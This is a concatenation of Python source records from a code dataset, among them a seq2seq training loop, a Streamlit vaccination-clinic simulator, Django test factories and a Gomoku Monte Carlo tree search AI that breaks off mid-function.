beta1=0.9)\n\toptimizer.setup(model)\n\toptimizer.add_hook(chainer.optimizer.GradientClipping(args.grad_clip))\n\toptimizer.add_hook(chainer.optimizer.WeightDecay(args.weight_decay))\n\tmin_learning_rate = 1e-7\n\tprev_wer = None\n\ttotal_time = 0\n\n\tdef mean(l):\n\t\treturn sum(l) / len(l)\n\n\t# training\n\tfor epoch in xrange(1, args.epoch + 1):\n\t\tprint(\"Epoch\", epoch)\n\t\tstart_time = time.time()\n\t\tfor itr in xrange(1, num_iteration + 1):\n\t\t\tfor repeat, source_bucket, target_bucket in zip(repeats, source_buckets_train, target_buckets_train):\n\t\t\t\tfor r in xrange(repeat):\n\t\t\t\t\t# sample minibatch\n\t\t\t\t\tsource_batch, target_batch = sample_batch_from_bucket(source_bucket, target_bucket, args.batchsize)\n\t\t\t\t\tskip_mask = source_batch != ID_PAD\n\t\t\t\t\ttarget_batch_input, target_batch_output = make_source_target_pair(target_batch)\n\n\t\t\t\t\t# to gpu\n\t\t\t\t\tif model.xp is cuda.cupy:\n\t\t\t\t\t\tskip_mask = cuda.to_gpu(skip_mask)\n\t\t\t\t\t\tsource_batch = cuda.to_gpu(source_batch)\n\t\t\t\t\t\ttarget_batch_input = cuda.to_gpu(target_batch_input)\n\t\t\t\t\t\ttarget_batch_output = cuda.to_gpu(target_batch_output)\n\n\t\t\t\t\t# compute loss\n\t\t\t\t\tmodel.reset_state()\n\t\t\t\t\tif args.attention:\n\t\t\t\t\t\tlast_hidden_states, last_layer_outputs = model.encode(source_batch, skip_mask)\n\t\t\t\t\t\tY = model.decode(target_batch_input, last_hidden_states, last_layer_outputs, skip_mask)\n\t\t\t\t\telse:\n\t\t\t\t\t\tlast_hidden_states = model.encode(source_batch, skip_mask)\n\t\t\t\t\t\tY = model.decode(target_batch_input, last_hidden_states)\n\t\t\t\t\tloss = softmax_cross_entropy(Y, target_batch_output, ignore_label=ID_PAD)\n\t\t\t\t\toptimizer.update(lossfun=lambda: loss)\n\n\t\t\t\tsys.stdout.write(\"\\r{} / {}\".format(itr, num_iteration))\n\t\t\t\tsys.stdout.flush()\n\n\t\t\tif itr % args.interval == 0 or itr == num_iteration:\n\t\t\t\tsave_model(args.model_dir, model)\n\n\t\t# show log\n\t\tsys.stdout.write(\"\\r\" + stdout.CLEAR)\n\t\tsys.stdout.flush()\n\t\tprint_bold(\"translate (train)\")\n\t\tshow_random_source_target_translation(model, source_buckets_train, target_buckets_train, vocab_inv_source, vocab_inv_target, num_translate=5, argmax=True)\n\t\tprint_bold(\"translate (dev)\")\n\t\tshow_random_source_target_translation(model, source_buckets_dev, target_buckets_dev, vocab_inv_source, vocab_inv_target, num_translate=5, argmax=True)\n\t\tprint_bold(\"WER (sampled train)\")\n\t\twer_train = compute_random_mean_wer(model, source_buckets_train, target_buckets_train, len(vocab_inv_target), sample_size=args.batchsize, argmax=True)\n\t\tprint(mean(wer_train), wer_train)\n\t\tprint_bold(\"WER (dev)\")\n\t\twer_dev = compute_mean_wer(model, source_buckets_dev, target_buckets_dev, len(vocab_inv_target), batchsize=args.batchsize, argmax=True)\n\t\tmean_wer_dev = mean(wer_dev)\n\t\tprint(mean_wer_dev, wer_dev)\n\t\telapsed_time = (time.time() - start_time) / 60.\n\t\ttotal_time += elapsed_time\n\t\tprint(\"done in {} min, lr = {}, total {} min\".format(int(elapsed_time), optimizer.alpha, int(total_time)))\n\n\t\t# decay learning rate\n\t\tif prev_wer is not None and mean_wer_dev >= prev_wer and optimizer.alpha > min_learning_rate:\n\t\t\toptimizer.alpha *= 0.5\n\t\tprev_wer = mean_wer_dev\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--batchsize\", \"-b\", type=int, default=50)\n\tparser.add_argument(\"--epoch\", \"-e\", type=int, default=1000)\n\tparser.add_argument(\"--gpu-device\", \"-g\", type=int, default=0) \n\tparser.add_argument(\"--grad-clip\", \"-gc\", type=float, default=5) \n\tparser.add_argument(\"--weight-decay\", \"-wd\", type=float, default=5e-5) \n\tparser.add_argument(\"--ndim-h\", \"-nh\", type=int, default=320)\n\tparser.add_argument(\"--ndim-embedding\", \"-ne\", type=int, default=320)\n\tparser.add_argument(\"--num-layers\", \"-layers\", type=int, default=4)\n\tparser.add_argument(\"--interval\", type=int, default=100)\n\tparser.add_argument(\"--seed\", type=int, default=0)\n\tparser.add_argument(\"--pooling\", \"-p\", type=str, default=\"fo\")\n\tparser.add_argument(\"--wgain\", \"-w\", type=float, default=0.01)\n\tparser.add_argument(\"--train-split\", type=float, default=0.9)\n\tparser.add_argument(\"--dev-split\", type=float, default=0.05)\n\tparser.add_argument(\"--source-filename\", \"-source\", default=None)\n\tparser.add_argument(\"--target-filename\", \"-target\", default=None)\n\tparser.add_argument(\"--buckets-limit\", type=int, default=None)\n\tparser.add_argument(\"--model-dir\", \"-m\", type=str, default=\"model\")\n\tparser.add_argument(\"--learning-rate\", \"-lr\", type=float, default=0.01)\n\tparser.add_argument(\"--densely-connected\", \"-dense\", default=False, action=\"store_true\")\n\tparser.add_argument(\"--zoneout\", \"-zoneout\", default=False, action=\"store_true\")\n\tparser.add_argument(\"--dropout\", \"-dropout\", default=False, action=\"store_true\")\n\tparser.add_argument(\"--eve\", default=False, action=\"store_true\")\n\tparser.add_argument(\"--attention\", default=False, action=\"store_true\")\n\targs = parser.parse_args()\n\tmain(args)","sub_path":"seq2seq/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"390503739","text":"import random\r\nimport simpy\r\nimport numpy as np\r\nimport math\r\nimport streamlit as st\r\nfrom functools import partial, wraps\r\nimport scipy.stats\r\n\r\ndef conf_interval(data, confidence=0.95):\r\n a = 1.0 * np.array(data)\r\n n = len(a)\r\n m, se = np.mean(a), scipy.stats.sem(a)\r\n h = se * scipy.stats.t.ppf((1 + confidence) / 2., n-1)\r\n return h\r\n\r\ndef run_vaccination_simulation(NUM_REPS, RANDOM_SEED, NUM_CHECKIN, CHECKIN_TIME, PATIENT_INTER, SIM_TIME, NUM_VACCINATORS, VACCINATION_TIME, NUM_ADVERSEWAIT, ADVERSEWAIT_TIME):\r\n output_checkin_waittime = []\r\n output_checkin_waitnum = []\r\n output_vaccination_waittime = []\r\n output_vaccination_waitnum = []\r\n output_adverse_waittime = []\r\n output_adverse_waitnum = []\r\n output_total_facility_time = []\r\n output_num_vaccinated = []\r\n\r\n my_bar = st.progress(0.0)\r\n reps = math.ceil(NUM_REPS)\r\n for replication in range(0,reps):\r\n percent_complete = float(replication/reps)\r\n facility_arrival_times = []\r\n checkin_begin_times = []\r\n checkin_end_times = []\r\n vaccination_begin_times = []\r\n vaccination_end_times = []\r\n adverse_begin_times = []\r\n adverse_end_times = []\r\n facility_departure_times = []\r\n\r\n\r\n class Vaccination_Clinic(object):\r\n def __init__(self, env, num_checkin, checkin_time, num_vaccinators, vaccination_time, num_adversewait, adversewait_time):\r\n self.env = env\r\n self.checkin_personnel = simpy.Resource(env, num_checkin)\r\n self.checkintime = checkin_time\r\n self.vaccination_booth = simpy.Resource(env, num_vaccinators)\r\n self.vaccinationtime = vaccination_time\r\n self.adverse_event_spot = simpy.Resource(env, num_adversewait)\r\n self.adversewaittime = adversewait_time\r\n\r\n def checkin(self, patient):\r\n yield self.env.timeout(np.random.triangular(max(0.2, CHECKIN_TIME - 1), CHECKIN_TIME, CHECKIN_TIME + 1))\r\n\r\n\r\n def vaccinate(self, patient):\r\n yield self.env.timeout(np.random.triangular(max(VACCINATION_TIME - 1, 0.2), VACCINATION_TIME, VACCINATION_TIME + 1))\r\n\r\n def monitor_adverse(self, patient):\r\n yield self.env.timeout(ADVERSEWAIT_TIME)\r\n\r\n def patient(env, name, vac):\r\n #print('%s arrives at the vaccination clinic at %.2f.' % (name, env.now))\r\n facility_arrival_times.append(env.now)\r\n with vac.checkin_personnel.request() as request:\r\n yield request\r\n\r\n #print(\"%s arrives at check-in counter\" % name)\r\n checkin_begin_times.append(env.now)\r\n yield env.process(vac.checkin(name))\r\n checkin_end_times.append(env.now)\r\n #print(\"%s completes check-in at %.2f.\" % (name, env.now))\r\n\r\n with vac.vaccination_booth.request() as request:\r\n yield request\r\n vaccination_begin_times.append(env.now)\r\n #print(\"%s arrives at vaccination booth\" % name)\r\n yield env.process(vac.vaccinate(name))\r\n vaccination_end_times.append(env.now)\r\n\r\n\r\n #print(\"%s gets shot in the arm at %.2f.\" % (name, env.now))\r\n\r\n with vac.adverse_event_spot.request() as request:\r\n yield request\r\n adverse_begin_times.append(env.now)\r\n #print(\"%s proceeds to wait to monitor for adverse events\" % name)\r\n yield env.process(vac.monitor_adverse(name))\r\n adverse_end_times.append(env.now)\r\n facility_departure_times.append(env.now)\r\n #print(\"%s leaves facility safely at %.2f.\" % (name, env.now))\r\n\r\n def setup(env, num_checkin, checkin_time, num_vaccinators, vaccination_time, num_adversewait, adversewait_time, patient_inter):\r\n vaccinationclinic = Vaccination_Clinic(env, num_checkin, checkin_time, num_vaccinators, vaccination_time, num_adversewait, adversewait_time)\r\n i = 0\r\n while True:\r\n yield env.timeout(np.random.exponential(scale=patient_inter))\r\n i += 1\r\n env.process(patient(env, 'Patient %d' % i, vaccinationclinic)) \r\n\r\n\r\n random.seed(RANDOM_SEED)\r\n\r\n # Create an environment and start the setup process\r\n env = simpy.Environment()\r\n env.process(setup(env, NUM_CHECKIN, CHECKIN_TIME, NUM_VACCINATORS, VACCINATION_TIME, NUM_ADVERSEWAIT, ADVERSEWAIT_TIME, PATIENT_INTER))\r\n # Execute!\r\n env.run(until=SIM_TIME)\r\n average_facility_total_time = np.mean([facility_departure_times[i] - facility_arrival_times[i] for i in range(len(facility_departure_times))])\r\n #print(\"Approximate total time at facility is %.1f mins.\" % average_facility_total_time)\r\n average_checkin_wait_time = np.mean([checkin_begin_times[i] - facility_arrival_times[i] for i in range(len(checkin_begin_times))])\r\n #print(\"Approximate wait time between arrival and checkin is %.1f mins.\" % average_checkin_wait_time)\r\n average_vaccination_wait_time = np.mean([vaccination_begin_times[i] - checkin_end_times[i] for i in range(len(vaccination_begin_times))])\r\n #print(\"Approximate wait time between checkin and getting vaccinated is %.1f mins.\" % average_vaccination_wait_time)\r\n average_adverse_wait_time = np.mean([adverse_begin_times[i] - vaccination_end_times[i] for i in range(len(adverse_begin_times))])\r\n #print(\"Approximate wait time between getting vaccine and finding adverse monitoring wait spot is %.1f mins.\" % average_adverse_wait_time)\r\n\r\n avg_waiting_checkin = []\r\n for i in [x * 0.1 for x in range(0, SIM_TIME*10)]:\r\n num_arrived_facility = sum(1 for j in facility_arrival_times if j <= i)\r\n num_started_checin = sum(1 for j in checkin_begin_times if j <= i)\r\n avg_waiting_checkin.append(num_arrived_facility - num_started_checin)\r\n #print(\"Approximate # of patients waiting to checkin at any time is %.1f.\" % np.mean(avg_waiting_checkin))\r\n\r\n avg_waiting_vaccine = []\r\n for i in [x * 0.1 for x in range(0, SIM_TIME*10)]:\r\n num_finished_checin = sum(1 for j in checkin_end_times if j <= i)\r\n num_started_vaccine = sum(1 for j in vaccination_begin_times if j <= i)\r\n avg_waiting_vaccine.append(num_finished_checin - num_started_vaccine)\r\n #print(\"Approximate # of patients waiting between checkin and vaccine at any time is %.1f.\" % np.mean(avg_waiting_vaccine))\r\n\r\n avg_waiting_adverse = []\r\n for i in [x * 0.1 for x in range(0, SIM_TIME*10)]:\r\n num_finished_vaccine = sum(1 for j in vaccination_end_times if j <= i)\r\n num_started_adverse = sum(1 for j in adverse_begin_times if j <= i)\r\n avg_waiting_adverse.append(num_finished_vaccine - num_started_adverse)\r\n #print(\"Approximate # of patients waiting between checkin and vaccine at any time is %.1f.\" % np.mean(avg_waiting_vaccine))\r\n\r\n output_checkin_waittime.append(average_checkin_wait_time)\r\n output_checkin_waitnum.append(np.mean(avg_waiting_checkin))\r\n output_vaccination_waittime.append(average_vaccination_wait_time)\r\n output_vaccination_waitnum.append(np.mean(avg_waiting_vaccine))\r\n output_adverse_waittime.append(average_adverse_wait_time)\r\n output_adverse_waitnum.append(np.mean(avg_waiting_adverse))\r\n output_total_facility_time.append(average_facility_total_time)\r\n output_num_vaccinated.append(len(facility_departure_times))\r\n \r\n \r\n my_bar.progress(float(percent_complete))\r\n my_bar.progress(1.0) \r\n return [np.mean(output_checkin_waittime), np.mean(output_checkin_waitnum), np.mean(output_vaccination_waittime), \r\n np.mean(output_vaccination_waitnum), np.mean(output_adverse_waittime), np.mean(output_adverse_waitnum), conf_interval(output_total_facility_time),\r\n np.mean(output_total_facility_time), conf_interval(output_num_vaccinated), np.mean(output_num_vaccinated)]\r\n\r\n\r\nst.title('Vaccination Clinic Scheduling & Staffing Calculator')\r\n\r\nst.markdown('This calculator allows you to experiment with patient scheduling and personnel staffing at a single vaccination clinic \\\r\n to estimate the effects on desired operational goals and metrics. ')\r\nst.markdown('The flow of patients through the clinic is assumed to be the following: Patients arrive to the facility according to a schedule. \\\r\n Patients proceed to one (of maybe several) check-in stations. If all stations are occupied, patients wait in line.\\\r\n Following check-in, patients proceed to one of several available vaccination booths (or wait in line if all are busy).\\\r\n After getting a vaccine, patients are asked to proceed to a waiting area for approximately 15 minutes while they are monitored for\\\r\n adverse reactions. After 15 minutes, patients may safely leave the facility.')\r\nst.markdown('If you would like to experiment with additional parameters or would like modifications, please feel free to reach out via mail')\r\nst.markdown('Some technical notes: Patient arrivals are assumed to adhere to a poisson arrival process. Times to check-in and get a shot are assumed to be triangular around the mean. To play around with modifying these distributions, \\\r\n please feel free to reach out.')\r\n\r\nst.sidebar.title(\"Input values here\")\r\n\r\nnum_arrive_hour = st.sidebar.number_input(\"Patients expected per hour\", min_value = 1, value = 30)\r\n# num_checkin = st.sidebar.number_input(\"Check-in counters\", min_value = 1, value = 1)\r\n# num_vaccine_booths = st.sidebar.number_input(\"Vaccination booths\", min_value = 1, value = 5)\r\nnum_waiting_area_adverse = st.sidebar.number_input(\"Waiting spots to monitor patients for adverse reactions\", min_value = 1, value = 5)\r\nhours_facility_open = st.sidebar.number_input(\"Hours of facility opening\", min_value = 1, value = 8)\r\n\r\n# CHECKIN_TIME = st.sidebar.number_input(\"Minutes for a single patient check-in\", min_value = 0.1, value = 1.0)\r\n# VACCINATION_TIME = st.sidebar.number_input(\"Minutes for a single vaccination\", min_value = 0.1, value = 4.0)\r\n\r\nwith st.sidebar.beta_expander(\"Check-in counter parameters\", True):\r\n CHECKIN_TIME = st.number_input(\"Minutes for a single patient check-in\", min_value = 0.1, value = 1.0)\r\n num_checkin = st.number_input(\"Input the number of check-in counters available for your patients\", min_value = 1, value = 1)\r\n # num_arrive_hour = st.number_input(\"Input the number of patients you expect will arrive in an hour\", min_value = 1, value = 30)\r\n\r\nwith st.sidebar.beta_expander(\"Vaccination booth parameters\", True):\r\n num_vaccine_booths = st.number_input(\"Vaccination booths\", min_value = 1, value = 5)\r\n VACCINATION_TIME = st.number_input(\"Minutes for a single vaccination\", min_value = 0.1, value = 4.0) \r\n\r\nst.sidebar.write(\"\"\"\\n \\n \\n\"\"\")\r\n\r\nif(st.sidebar.button('Calculate Metrics')): \r\n RANDOM_SEED = 42\r\n NUM_CHECKIN = num_checkin\r\n #CHECKIN_TIME = 1\r\n PATIENT_INTER = 60/num_arrive_hour\r\n #NUM_REPS = 15\r\n NUM_REPS = math.ceil(-0.114*num_arrive_hour + 33.4)\r\n SIM_TIME = 60*hours_facility_open\r\n NUM_VACCINATORS = num_vaccine_booths\r\n #VACCINATION_TIME = 4\r\n NUM_ADVERSEWAIT = num_waiting_area_adverse\r\n ADVERSEWAIT_TIME = 15\r\n [avg_checkin_waitT, avg_checkin_waitN, avg_vaccine_waitT, avg_vaccine_waitN, avg_adverse_waitT, avg_adverse_waitN, conf_total_time, avg_total_time, conf_total_vaccinated, tot_num_vaccinated] = run_vaccination_simulation(NUM_REPS, RANDOM_SEED, NUM_CHECKIN, CHECKIN_TIME, PATIENT_INTER, SIM_TIME, NUM_VACCINATORS, VACCINATION_TIME, NUM_ADVERSEWAIT, ADVERSEWAIT_TIME)\r\n if(avg_total_time <= 30):\r\n st.success(\"Patients can expect to be in the facility for approximately {:0.1f} mins.\".format(avg_total_time)) \r\n elif(avg_total_time <= 60):\r\n st.warning(\"Patients can expect to be in the facility for approximately {:0.1f} mins.\".format(avg_total_time))\r\n else:\r\n st.error(\"Patients can expect to be in the facility for approximately {:0.1f} mins.\".format(avg_total_time))\r\n \r\n if(avg_checkin_waitN <= 5):\r\n st.success(\"An average of {:0.0f} patients will wait in line for check-in\".format(avg_checkin_waitN))\r\n elif(avg_checkin_waitN <= 15):\r\n st.warning(\"An average of {:0.0f} patients will wait in line for check-in. May need more check-in counters\".format(avg_checkin_waitN))\r\n else:\r\n st.error(\"An average of {:0.0f} patients will wait in line for check-in. Please add more check-in counters\".format(avg_checkin_waitN))\r\n\r\n if(avg_vaccine_waitN < 5):\r\n st.success(\"An average of {:0.0f} patients will wait in line between check-in and vaccination.\".format(avg_vaccine_waitN))\r\n if(avg_vaccine_waitN >= 5):\r\n st.error(\"An average of {:0.0f} patients will wait in line between check-in and vaccination. Please add more vaccination booths.\".format(avg_vaccine_waitN))\r\n\r\n if(avg_adverse_waitN <= 2):\r\n st.success(\"An average of {:0.0f} patients will not have adverse waiting spots.\".format(avg_adverse_waitN))\r\n else:\r\n st.error(\"An average of {:0.0f} patients will not have adverse waiting spots. Please add more.\".format(avg_adverse_waitN))\r\n \r\n st.info(\"Approximately {:0.0f} patients can expect to be vaccinated during this {} hour time-frame\".format(tot_num_vaccinated, hours_facility_open))\r\n\r\n","sub_path":"vaccine-estimator.py","file_name":"vaccine-estimator.py","file_ext":"py","file_size_in_byte":13621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"152127203","text":"\n\n#calss header\nclass _WOODCARVING():\n\tdef __init__(self,): \n\t\tself.name = \"WOODCARVING\"\n\t\tself.definitions = [u'the process of cutting into the surface of wood to create a decorative shape or pattern: ', u'a piece of wood that has been decorated in this way: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_woodcarving.py","file_name":"_woodcarving.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"522648024","text":"import cv2 #pip3 install opencv-python\n\nimage = cv2.imread(\"02.jpg\")\ngray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ncv2.imwrite(\"gray.png\", gray_image)\ninverted_image = 255 - gray_image\ncv2.imwrite(\"inv.png\", inverted_image)\nblurred = cv2.GaussianBlur(inverted_image, (21, 21), 0)\ncv2.imwrite(\"blur.png\", blurred)\ninverted_blurred = 255 - blurred\ncv2.imwrite(\"invblur.png\", inverted_blurred)\npencil_sketch = cv2.divide(gray_image, inverted_blurred, scale=256.0)\ncv2.imwrite(\"Sketch.png\", pencil_sketch)","sub_path":"image_to_sketch/sketch.py","file_name":"sketch.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"564265837","text":"# _*_ coding: UTF-8 _*_\n# @Time : 2021/10/21 19:25\n# @Author : caoyujie\n# @Site : \n# @File : excel_openpyxl.py\n# @Software : PyCharm\n\n\nimport openpyxl\n\nexcel=openpyxl.load_workbook('../other_projects/openpyxll.xlsx')\n\nfor i in excel.sheetnames:\n # excel[i]只是一个对象\n for j in excel[i].values:\n # 每一行的内容\n if type(j[0]) is int:\n print(j)\n\n\n","sub_path":"other_projects/excel_openpyxl.py","file_name":"excel_openpyxl.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"338247194","text":"import factory\nfrom faker import Factory as FakerFactory\nfrom django.core.files import File\nfrom pytz import timezone\n\nfrom intake import models\nfrom unittest.mock import Mock\n\nfake = FakerFactory.create('en_US', includes=['intake.tests.mock_county_forms'])\nPacific = timezone('US/Pacific')\n\nRAW_FORM_DATA = {\n 'address_city': [''],\n 'address_state': ['CA'],\n 'address_street': [''],\n 'address_zip': [''],\n 'dob_day': [''],\n 'dob_month': [''],\n 'dob_year': [''],\n 'drivers_license_number': [''],\n 'email': [''],\n 'first_name': [''],\n 'how_did_you_hear': [''],\n 'last_name': [''],\n 'middle_name': [''],\n 'monthly_expenses': [''],\n 'monthly_income': [''],\n 'phone_number': [''],\n 'ssn': [''],\n 'when_probation_or_parole': [''],\n 'when_where_outside_sf': [''],\n 'where_probation_or_parole': ['']\n}\n\n\ndef local(datetime):\n return Pacific.localize(datetime)\n\n\nclass FormSubmissionFactory(factory.DjangoModelFactory):\n date_received = factory.LazyFunction(\n lambda: local(fake.date_time_between('-2w', 'now')))\n answers = factory.LazyFunction(\n lambda: fake.sf_county_form_answers())\n\n class Meta:\n model = models.FormSubmission\n\n\nclass FillablePDFFactory(factory.DjangoModelFactory):\n class Meta:\n model = models.FillablePDF\n\n\ndef fillable_pdf():\n return FillablePDFFactory.create(\n name = \"Sample PDF\",\n pdf = File(open(\n 'tests/sample_pdfs/sample_form.pdf', 'rb')),\n translator = \"tests.sample_translator.translate\"\n )\n\nclass FrontSendMessageResponse:\n SUCCESS_JSON = {'status': 'accepted'}\n ERROR_JSON = {'errors': [{'title': 'Bad request', 'detail': 'Body did not satisfy requirements', 'status': '400'}]}\n \n @classmethod\n def _make_response(cls, status_code, json):\n mock_response = Mock(status_code=status_code)\n mock_response.json.return_value = json\n return mock_response\n\n @classmethod\n def success(cls):\n return cls._make_response(202, cls.SUCCESS_JSON)\n\n @classmethod\n def error(cls):\n return cls._make_response(400, cls.ERROR_JSON)\n\n","sub_path":"intake/tests/mock.py","file_name":"mock.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"552649953","text":"from goboard import Player, BoardInfo, GuiManager\nimport random\nfrom math import *\nimport time\n\n# stone value notations\n# '*' : where you put stone in this action.\n# '?' : don't know state.\n# '1' : our stone\n# '2' : enemy's stone\n# '0' : empty\n# 'x' : boundary\nvalues = {\n '?*1?': 0,\n '?*11?': 0,\n '?*111?': 0,\n '?*1111?': -10000,\n '?*2?': 1,\n '?*22?': 10,\n '?*222?': 100,\n '?*2222?': 1000,\n}\n\nclass Ai(Player):\n def __init__(self, color, **kwargs):\n super(Ai, self).__init__(color)\n self.state = GomokuState()\n self.state.color = color\n self.action_number = 0\n try:\n size_x, size_y = kwargs['board_size']\n self.state.n = size_x\n except IndexError:\n self.state.n = 13\n\n def get_action(self, board: BoardInfo) -> (int, int):\n\n self.get_alert(board)\n\n self.action_number = self.action_number + 1\n self.state.update_with_board_info(board)\n maxtime = 2\n if self.action_number == 1:\n maxtime = 5\n move = UCT(rootstate=self.state, maxtime=maxtime, verbose=False)\n print(\"Best Move: \" + str(move))\n possible_x = int(move / self.state.n)\n possible_y = int(move % self.state.n)\n if board.is_legal_action(possible_x, possible_y):\n print(\"Move possible: %d,%d\" % (possible_x, possible_y))\n return possible_x, possible_y\n else:\n print(\"Move not possible: %d,%d\" % (possible_x, possible_y))\n # default to easy ai for now, need another solution\n for x in range(0, board.size_x):\n for y in range(0, board.size_y):\n if board.is_legal_action(x, y):\n return x, y\n else:\n continue\n def get_alert(self, board: BoardInfo):\n defensive_actions, winning_actions = self.get_critical_actions(board)\n print(\"ALERT\")\n print(defensive_actions)\n print(winning_actions)\n\n def get_critical_actions(self, board: BoardInfo):\n\n deffensive_actions = []\n winning_actions = []\n for ((x, y), _) in board.steps:\n for (dx, dy) in [(1, 0), (-1, 0), (0, 1), (0, -1), (1, 1), (-1, -1), (-1, 1), (1, -1)]:\n if board.is_legal_action(x + dx, y + dy):\n weight = analysis_action(board, (x + dx, y + dy), self.color)\n if weight >= 100:\n deffensive_actions.append(((x + dx, y + dy), weight))\n\n if weight <= -1:\n winning_actions.append(((x + dx, y + dy), weight))\n\n deffensive_actions = sorted(deffensive_actions, key=lambda x: x[1], reverse=True)\n return deffensive_actions, winning_actions\n\n\nclass GomokuState:\n\n def update_with_board_info(self, board_info):\n self.board = [0 for element in range(self.n * self.n)]\n for x in range(0, board_info.size_x):\n for y in range(0, board_info.size_y):\n if board_info.is_black(x, y):\n if self.color == \"black\":\n self.board[int(x * self.n) + y] = 1\n else:\n self.board[int(x * self.n) + y] = 2\n else:\n if board_info.is_white(x, y):\n if self.color == \"white\":\n self.board[int(y * self.n) + x] = 1\n else:\n self.board[int(y * self.n) + x] = 2\n # print(self)\n\n def __init__(self):\n self.color = \"white\"\n self.playerJustMoved = 2 # At the root pretend the player just moved is p2 - p1 has the first move\n self.n = 13 # board size\n self.board = [0 for element in range(self.n * self.n)] # 0 = empty, 1 = player 1, 2 = player 2\n self.win_positions = []\n self.win_positions += self.generate_diagonal_win_positions()\n self.win_positions += self.generate_horizontal_win_positions()\n self.win_positions += self.generate_vertical_win_positions()\n\n def Clone(self):\n \"\"\" Create a deep clone of this game state.\n \"\"\"\n st = GomokuState()\n st.playerJustMoved = self.playerJustMoved\n st.board = self.board[:]\n st.n = self.n\n st.win_positions = self.win_positions\n st.color = self.color\n return st\n\n def DoMove(self, move):\n \"\"\" Update a state by carrying out the given move.\n Must update playerToMove.\n \"\"\"\n assert move >= 0 and move < (self.n * self.n) and move == int(move) and self.board[move] == 0\n self.playerJustMoved = 3 - self.playerJustMoved\n self.board[move] = self.playerJustMoved\n\n def GetMoves(self):\n \"\"\" Get all possible moves from this state.\n \"\"\"\n # if self.player_has_won():\n # print(self)\n # return []\n return [i for i in range(self.n * self.n) if self.board[i] == 0]\n\n def GetResult(self, playerjm):\n \"\"\" Get the game result from the viewpoint of playerjm.\n \"\"\"\n for (v, w, x, y, z) in self.win_positions:\n if self.board[v] == self.board[w] == self.board[x] == self.board[y] == self.board[z]:\n if self.board[v] == playerjm:\n return 1.0\n else:\n return 0.0\n if self.GetMoves() == []: return 0.5 # draw\n assert False # Should not be possible to get here\n\n def player_has_won(self):\n for (v, w, x, y, z) in self.win_positions:\n if (self.board[v] == 1 or self.board[v] == 2) and (\n self.board[v] == self.board[w] == self.board[x] == self.board[y] == self.board[z]):\n return True\n return False\n\n def generate_horizontal_win_positions(self):\n h_win_positions = []\n for i in range(0, (self.n * self.n)):\n if ((i % self.n) < self.n) and (((i % self.n) + 5) < self.n):\n h_win_positions += [(i, i + 1, i + 2, i + 3, i + 4)]\n return h_win_positions\n\n def generate_vertical_win_positions(self):\n v_win_positions = []\n for i in range(0, (self.n * self.n)):\n if ((i % self.n) < self.n) and ((i + 5 * self.n) < self.n * self.n):\n v_win_positions += [(i, i + 1 * self.n, i + 2 * self.n, i + 3 * self.n, i + 4 * self.n)]\n return v_win_positions\n\n def generate_diagonal_win_positions(self):\n d_win_positions = []\n n = self.n\n for i in range(0, (self.n * self.n)):\n if ((i % n) < n) and ((i + 4 * n + 4) <= (n * n - 1) and (i % n) + 4 < n):\n d_win_positions += [(i, i + 1 * n + 1, i + 2 * n + 2, i + 3 * n + 3, i + 4 * n + 4)]\n if ((i % n) < n) and ((i + 4 * n - 4) <= (n * n - 1) and (i % n) - 4 >= 0):\n d_win_positions += [(i, i + 1 * n - 1, i + 2 * n - 2, i + 3 * n - 3, i + 4 * n - 4)]\n return d_win_positions\n\n def __repr__(self):\n s = \"\"\n for i in range(self.n * self.n):\n if self.board[i] == 0:\n s += '[ ]'\n else:\n if self.board[i] == 1:\n s += '[1]'\n else:\n if self.board[i] == 2:\n s += '[2]'\n if i % self.n == self.n - 1:\n s += '\\n'\n return s\n\n\nclass Node:\n \"\"\" A node in the game tree. Note wins is always from the viewpoint of playerJustMoved.\n Crashes if state not specified.\n \"\"\"\n\n def __init__(self, move=None, parent=None, state=None):\n self.move = move # the move that got us to this node - \"None\" for the root node\n self.parentNode = parent # \"None\" for the root node\n self.childNodes = []\n self.wins = 0\n self.visits = 0\n self.untriedMoves = state.GetMoves() # future child nodes\n self.playerJustMoved = state.playerJustMoved # the only part of the state that the Node needs later\n\n def UCTSelectChild(self):\n \"\"\" Use the UCB1 formula to select a child node. Often a constant UCTK is applied so we have\n lambda c: c.wins/c.visits + UCTK * sqrt(2*log(self.visits)/c.visits to vary the amount of\n exploration versus exploitation.\n \"\"\"\n s = sorted(self.childNodes, key=lambda c: c.wins / c.visits + sqrt(2 * log(self.visits) / c.visits))[-1]\n return s\n\n def AddChild(self, m, s):\n \"\"\" Remove m from untriedMoves and add a new child node for this move.\n Return the added child node\n \"\"\"\n n = Node(move=m, parent=self, state=s)\n self.untriedMoves.remove(m)\n self.childNodes.append(n)\n return n\n\n def Update(self, result):\n \"\"\" Update this node - one additional visit and result additional wins. result must be from the viewpoint of playerJustmoved.\n \"\"\"\n self.visits += 1\n self.wins += result\n\n def __repr__(self):\n return \"[M:\" + str(self.move) + \" W/V:\" + str(self.wins) + \"/\" + str(self.visits) + \" U:\" + str(\n self.untriedMoves) + \"]\"\n\n def TreeToString(self, indent):\n s = self.IndentString(indent) + str(self)\n for c in self.childNodes:\n s += c.TreeToString(indent + 1)\n return s\n\n def IndentString(self, indent):\n s = \"\\n\"\n for i in range(1, indent + 1):\n s += \"| \"\n return s\n\n def ChildrenToString(self):\n s = \"\"\n for c in self.childNodes:\n s += str(c) + \"\\n\"\n return s\n\ndef analysis_action(board: BoardInfo, action, color):\n if color == 